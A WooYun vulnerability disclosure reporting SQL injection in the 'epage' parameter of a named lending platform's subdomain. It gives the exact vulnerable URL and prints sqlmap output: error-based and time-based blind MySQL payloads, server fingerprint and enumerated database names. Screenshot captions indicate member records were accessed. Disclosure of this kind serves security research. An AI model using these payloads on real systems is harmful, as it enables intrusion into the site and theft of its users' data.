当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0156357

漏洞标题:乐融巴巴网络借贷平台某站注入漏洞打包

相关厂商:lrbaba.com

漏洞作者: 路人甲

提交时间:2015-11-27 18:41

修复时间:2016-01-11 18:42

公开时间:2016-01-11 18:42

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:未联系到厂商或者厂商积极忽略

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-11-27: 积极联系厂商并且等待厂商认领中,细节不对外公开
2016-01-11: 厂商已经主动忽略漏洞,细节向公众公开

简要描述:

RT

详细说明:

这么严重的漏洞,上个首页过分吗?

漏洞证明:

注入地址:

http://xj.lrbaba.com/index.php?comment&type=list&code=article&id=180&page=1&epage=3


注入参数是epage
加单引号报错:

单引号报错.png


GET parameter 'epage' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 2098 HTTP(s) requests:
---
Parameter: epage (GET)
    Type: error-based
    Title: MySQL >= 5.1 error-based - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: comment&type=list&code=article&id=180&page=1&epage=3  PROCEDURE ANALYSE(EXTRACTVALUE(7294,CONCAT(0x5c,0x71787a7a71,(SELECT (CASE WHEN (7294=7294) THEN 1 ELSE 0 END)),0x717
    Type: AND/OR time-based blind
    Title: MySQL >= 5.1 time-based blind (heavy query) - PROCEDURE ANALYSE (EXTRACTVALUE)
    Payload: comment&type=list&code=article&id=180&page=1&epage=3  PROCEDURE ANALYSE(EXTRACTVALUE(6825,CONCAT(0x5c,(BENCHMARK(5000000,MD5(0x66754441))))),1)
---
[15:28:59] [INFO] the back-end DBMS is MySQL
web server operating system: Windows 2003 or XP
web application technology: ASP.NET, Microsoft IIS 6.0, PHP 5.2.17
back-end DBMS: MySQL 5.1
[15:28:59] [INFO] fetching database names
[15:29:00] [INFO] the SQL query used returns 2 entries
[15:29:00] [INFO] retrieved: information_schema
[15:29:00] [INFO] retrieved: xjlrbaba
available databases [2]:
[*] information_schema
[*] xjlrbaba


修复方案:

数据库:

2个库.png


成员信息:

member.png


member-具体信息.png

版权声明:转载请注明来源 路人甲@乌云

漏洞回应

厂商回应:

未能联系到厂商或者厂商积极拒绝